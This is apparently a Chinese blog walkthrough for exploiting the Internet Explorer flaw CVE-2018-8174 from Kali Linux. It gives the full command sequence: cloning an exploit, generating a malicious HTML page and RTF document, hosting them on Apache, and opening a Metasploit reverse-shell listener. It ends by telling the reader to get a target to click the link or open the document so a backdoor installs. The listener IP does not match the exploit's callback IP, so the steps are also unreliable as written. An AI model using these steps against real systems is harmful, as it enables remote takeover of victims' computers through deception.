CVE-2018-8174

2018年4月20日确认,5月8日发布官方补丁

影响最新版本的IE浏览器及使用IE内核的应用程序

1.从github上克隆CVE-2018-8174的EXP到Kali Linux

git clone +CVE-2018-8174的EXP(漏洞利用模块)的地址

   也可以在主机上下载好然后通过xshell传到kali linux

2.生成恶意html和rtf文件
cd CVE-2018-8174_EXP/

python CVE-2018-8174.py -u http://192.168.127.131/exploit.html -o exploit.rtf -i 192.168.127.131 -p 4444

-u生成具有后门的地址,-o生成word文档,-i监听的地址,

3.将恶意html文件移动到网站根目录,启动apache2服务

service apache2 start

cp exploit.html exploit.rtf  /var/www/html/

4.重新打开一个终端,生成msf监听

Msfconsole

use exploit/multi/handler

set PAYLOAD Windows/shell/reverse_tcp

set LHOST 192.168.114.130

set lport 4444

Run

然后使目标机点击http://192.168.127.131/exploit.html

或者使目标保存exploit.rtf文档,打开文档则自己下载一个后门

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值